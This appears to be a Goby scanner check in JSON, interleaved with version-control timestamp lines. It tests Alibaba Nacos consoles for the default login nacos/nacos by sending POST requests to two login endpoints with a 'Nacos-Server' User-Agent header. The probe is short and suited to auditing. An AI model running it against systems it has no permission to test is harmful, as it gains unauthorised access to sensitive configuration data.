2022-11-25 02:08:58 -08:00
{
2022-12-01 10:14:36 -08:00
"Name" : "Alibaba Nacos Default password" ,
2022-11-25 02:08:58 -08:00
"Level" : "1" ,
"Tags" : [
2022-12-01 10:14:36 -08:00
"Default password"
2022-11-25 02:08:58 -08:00
] ,
2022-12-01 10:14:36 -08:00
"GobyQuery" : "title==\"Nacos\"" ,
"Description" : "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can log in to the background to view sensitive information (nacos/naocs)" ,
2022-11-25 02:08:58 -08:00
"Product" : "Alibaba Nacos" ,
"Homepage" : "https://github.com/alibaba/nacos" ,
2022-12-01 10:14:36 -08:00
"Author" : "PeiQi" ,
"Impact" : "<p>Log in to the background to view sensitive information<br></p>" ,
"Recommandation" : "<p>Upgrade version</p>" ,
"References" : [
"http://wiki.peiqi.tech"
] ,
2022-11-25 02:08:58 -08:00
"ScanSteps" : [
"OR" ,
{
"Request" : {
"method" : "POST" ,
"uri" : "/v1/auth/users/login" ,
"follow_redirect" : false ,
"header" : {
"User-Agent" : "Nacos-Server" ,
"Content-Type" : "application/x-www-form-urlencoded"
} ,
"data_type" : "text" ,
"data" : "username=nacos&password=nacos"
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
}
]
} ,
"SetVariable" : [ ]
} ,
{
"Request" : {
"method" : "POST" ,
"uri" : "/nacos/v1/auth/users/login" ,
"follow_redirect" : false ,
"header" : {
"User-Agent" : "Nacos-Server" ,
"Content-Type" : "application/x-www-form-urlencoded"
} ,
"data_type" : "text" ,
"data" : "username=nacos&password=nacos"
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
}
]
} ,
"SetVariable" : [ ]
}
] ,
2022-12-01 10:14:36 -08:00
"PostTime" : "2021-04-04 18:56:41" ,
"GobyVersion" : "1.8.255"
2022-11-25 02:08:58 -08:00
}